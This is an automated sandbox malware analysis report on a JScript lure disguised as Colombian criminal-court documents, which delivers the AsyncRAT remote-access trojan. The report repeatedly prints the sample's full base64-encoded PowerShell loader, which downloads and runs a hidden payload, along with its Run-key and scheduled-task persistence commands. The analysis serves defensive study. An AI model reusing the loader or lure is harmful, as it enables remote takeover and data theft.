Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js

Overview

General Information

Sample name:Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js
Analysis ID:1674571
MD5:55b953145f20e1f6b1f7e7f5741bacec
SHA1:b2e741db6c57f558d4d212c1f64ecec062ea4004
SHA256:a6dba67aae8b3be407bfb4149fca24d9909ae671640121ecd1b9dc9d9f9ee976
Tags:jsuser-Yuyuko_Saigyouji
Infos:

Detection

AsyncRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected MSILDownloaderGeneric
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcAByAGUAcwBjAHIAaQBiAGkAbgBnACwAJwAxACcALAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAJwAsACcAZgBsAHUAYwB0AHUAbwB1AHMAJwAsACcATQBTAEIAdQBpAGwAZAAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAJwAsACcAMgAnACwAJwAnACkAKQA=' -replace '','';$tempiettos = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($embolic));Invoke-Expression $tempiettos;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8104 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 5716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.AsyncRAT as delivered by MintsLoader includes a PowerShell module with a DGA. The DGA is similar to MintsLoader's DGA, but generates more domains and uses more than one TLD.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0xc41a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0x130d8:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0x22fc0:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0x15f88:$a2: Stub.exe
      • 0x16018:$a2: Stub.exe
      • 0x25ea0:$a2: Stub.exe
      • 0x25f30:$a2: Stub.exe
      • 0xfb3a:$a3: get_ActivatePong
      • 0x1fa22:$a3: get_ActivatePong
      • 0x132f0:$a4: vmware
      • 0x231d8:$a4: vmware
      • 0x13168:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x23050:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x10a35:$a6: get_SslClient
      • 0x2091d:$a6: get_SslClient
      00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0x1316a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      • 0x23052:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.MSBuild.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        11.2.MSBuild.exe.400000.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
        • 0xc588:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
        • 0xf438:$a2: Stub.exe
        • 0xf4c8:$a2: Stub.exe
        • 0x8fea:$a3: get_ActivatePong
        • 0xc7a0:$a4: vmware
        • 0xc618:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
        • 0x9ee5:$a6: get_SslClient
        11.2.MSBuild.exe.400000.0.unpackrat_win_asyncratDetect AsyncRAT based on specific stringsSekoia.io
        • 0x8fea:$str01: get_ActivatePong
        • 0x9ee5:$str02: get_SslClient
        • 0x9f01:$str03: get_TcpClient
        • 0x8424:$str04: get_SendSync
        • 0x84d2:$str05: get_IsConnected
        • 0x8d4e:$str06: set_UseShellExecute
        • 0xc8ae:$str07: Pastebin
        • 0xdf46:$str08: Select * from AntivirusProduct
        • 0xf438:$str09: Stub.exe
        • 0xf4c8:$str09: Stub.exe
        • 0xc698:$str10: timeout 3 > NUL
        • 0xc588:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
        • 0xc618:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
        11.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
        • 0xc61a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        2.2.powershell.exe.13d95f2fb50.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          Click to see the 13 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_7776.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_7776.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

              Sigma Signatures

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AF
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Downloads\fluctuous.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AF
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", ProcessId: 7548, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Downloads\fluctuous.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfA